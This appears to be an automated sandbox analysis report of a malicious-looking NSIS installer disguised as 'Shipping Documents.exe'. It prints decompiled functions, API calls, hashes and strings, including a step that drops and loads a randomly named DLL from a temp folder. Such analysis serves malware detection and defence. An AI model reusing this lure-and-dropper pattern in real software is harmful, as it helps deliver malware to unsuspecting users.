                                          • String ID: "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\202139769574 Shipping Documents.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                          • API String ID: 2803837635-2598571877
                                          • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                          • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                                          • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                          • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\jones\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\jones\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

















                                          0x00401759
                                          0x00401760
                                          0x00401769
                                          0x0040176c
                                          0x0040176f
                                          0x00401774
                                          0x00401775
                                          0x0040177c
                                          0x00401798
                                          0x0040177e
                                          0x0040177f
                                          0x0040177f
                                          0x0040179e
                                          0x004017a8
                                          0x004017a8
                                          0x004017ac
                                          0x004017af
                                          0x004017b4
                                          0x004017b6
                                          0x004017b8
                                          0x004017bd
                                          0x004017bd
                                          0x004017c8
                                          0x004017c8
                                          0x004017d9
                                          0x004017db
                                          0x004017db
                                          0x004017dc
                                          0x004017dc
                                          0x004017df
                                          0x004017e2
                                          0x004017e5
                                          0x004017e5
                                          0x004017ec
                                          0x004017fb
                                          0x00401800
                                          0x00401803
                                          0x00401806
                                          0x00000000
                                          0x00000000
                                          0x00401808
                                          0x0040180b
                                          0x00401865
                                          0x0040186a
                                          0x004015b0
                                          0x004027bf
                                          0x004027bf
                                          0x00402a5a
                                          0x00402a5d
                                          0x00402a5d
                                          0x00000000
                                          0x0040180d
                                          0x00401813
                                          0x0040181e
                                          0x0040182b
                                          0x00401836
                                          0x0040184c
                                          0x0040184c
                                          0x0040184f
                                          0x00000000
                                          0x00401855
                                          0x00401855
                                          0x00401856
                                          0x00401873
                                          0x00402a63
                                          0x00402a63
                                          0x00402a63
                                          0x00401858
                                          0x00401858
                                          0x00401859
                                          0x00401492
                                          0x00402387
                                          0x00402387
                                          0x00402387
                                          0x00401856
                                          0x0040184f
                                          0x00402a65
                                          0x00402a69
                                          0x00402a69
                                          0x00401883
                                          0x00401888
                                          0x00401896
                                          0x0040189b
                                          0x004018a1
                                          0x004018a5
                                          0x004018a7
                                          0x004018af
                                          0x004018bb
                                          0x004018a9
                                          0x004018a9
                                          0x004018ad
                                          0x00000000
                                          0x00000000
                                          0x004018ad
                                          0x004018c4
                                          0x004018ca
                                          0x004018cc
                                          0x00000000
                                          0x004018d2
                                          0x004018d2
                                          0x004018d5
                                          0x004018ed
                                          0x004018d7
                                          0x004018da
                                          0x004018e3
                                          0x004018e3
                                          0x004018f2
                                          0x004018f7
                                          0x00402382
                                          0x00000000
                                          0x00402382
                                          0x00000000

                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                          • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                            • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                            • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                            • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                            • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                            • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll$uvlcopdlxoed
                                          • API String ID: 1941528284-2516333190
                                          • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                          • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                                          • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                          • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                          0x00405820
                                          0x00405824
                                          0x00405827
                                          0x0040582d
                                          0x00405831
                                          0x00405835
                                          0x0040583d
                                          0x00405844
                                          0x0040584a
                                          0x00405851
                                          0x00405858
                                          0x00405860
                                          0x00405862
                                          0x00000000
                                          0x00405862
                                          0x0040586c
                                          0x00405873
                                          0x00405889
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040588b
                                          0x0040588f

                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                          • GetLastError.KERNEL32 ref: 0040586C
                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                                          • GetLastError.KERNEL32 ref: 0040588B
                                          Strings
                                          • C:\Users\user\Desktop, xrefs: 00405815
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                          • API String ID: 3449924974-2028306314
                                          • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                          • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                                          • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                          • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                          0x004065da
                                          0x004065e3
                                          0x004065e5
                                          0x004065e5
                                          0x004065e9
                                          0x004065fb
                                          0x004065f5
                                          0x004065f5
                                          0x004065f5
                                          0x004065ff
                                          0x00406613
                                          0x00406627
                                          0x0040662e

                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                          • wsprintfA.USER32 ref: 00406613
                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%s.dll$UXTHEME$\
                                          • API String ID: 2200240437-4240819195
                                          • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                          • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                                          • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                          • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                          0x0040209d
                                          0x0040209d
                                          0x004020a2
                                          0x004020a9
                                          0x00402164
                                          0x004022dd
                                          0x004022dd
                                          0x00402a5a
                                          0x00402a5d
                                          0x00402a69
                                          0x00402a69
                                          0x004020b8
                                          0x004020c2
                                          0x004020c5
                                          0x004020d4
                                          0x004020d8
                                          0x004020de
                                          0x004020e2
                                          0x0040215d
                                          0x00000000
                                          0x0040215d
                                          0x004020e4
                                          0x004020ed
                                          0x004020f1
                                          0x00402135
                                          0x004020f3
                                          0x004020f6
                                          0x004020f9
                                          0x00402129
                                          0x004020fb
                                          0x004020fe
                                          0x00402107
                                          0x00402109
                                          0x00402109
                                          0x00402107
                                          0x004020f9
                                          0x0040213d
                                          0x00402152
                                          0x00402152
                                          0x00000000
                                          0x0040213d
                                          0x004020c8
                                          0x004020ce
                                          0x004020d2
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                            • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                            • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                            • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                            • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID: GB
                                          • API String ID: 2987980305-3285937634
                                          • Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                          • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                                          • Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                          • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                          0x00405df4
                                          0x00405dfa
                                          0x00405dfb
                                          0x00405dfb
                                          0x00405e00
                                          0x00405e01
                                          0x00405e04
                                          0x00405e0e
                                          0x00405e1b
                                          0x00405e1e
                                          0x00405e26
                                          0x00000000
                                          0x00000000
                                          0x00405e2a
                                          0x00000000
                                          0x00000000
                                          0x00405e2c
                                          0x00000000
                                          0x00405e2c
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E04
                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E1E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF3
                                          • nsa, xrefs: 00405DFB
                                          • "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" , xrefs: 00405DF0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-3645489953
                                          • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                          • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                                          • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                          • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                          0x004015bb
                                          0x004015c2
                                          0x004015c5
                                          0x004015ca
                                          0x004015ce
                                          0x004015d0
                                          0x004015d8
                                          0x004015da
                                          0x004015dc
                                          0x004015e0
                                          0x004015e3
                                          0x004015fb
                                          0x004015fc
                                          0x004015e5
                                          0x004015e5
                                          0x004015e8
                                          0x00000000
                                          0x004015f3
                                          0x004015f4
                                          0x004015f4
                                          0x004015e8
                                          0x00401603
                                          0x0040160a
                                          0x00401617
                                          0x00401617
                                          0x0040160c
                                          0x0040160d
                                          0x00401615
                                          0x00000000
                                          0x00000000
                                          0x00401615
                                          0x0040160a
                                          0x0040161a
                                          0x0040161d
                                          0x0040161f
                                          0x00401620
                                          0x004015d0
                                          0x00401627
                                          0x00401652
                                          0x004022dd
                                          0x00401629
                                          0x0040162b
                                          0x00401636
                                          0x0040163c
                                          0x00401644
                                          0x0040164a
                                          0x0040164a
                                          0x00401644
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                            • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405C67
                                            • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                            • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                            • Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
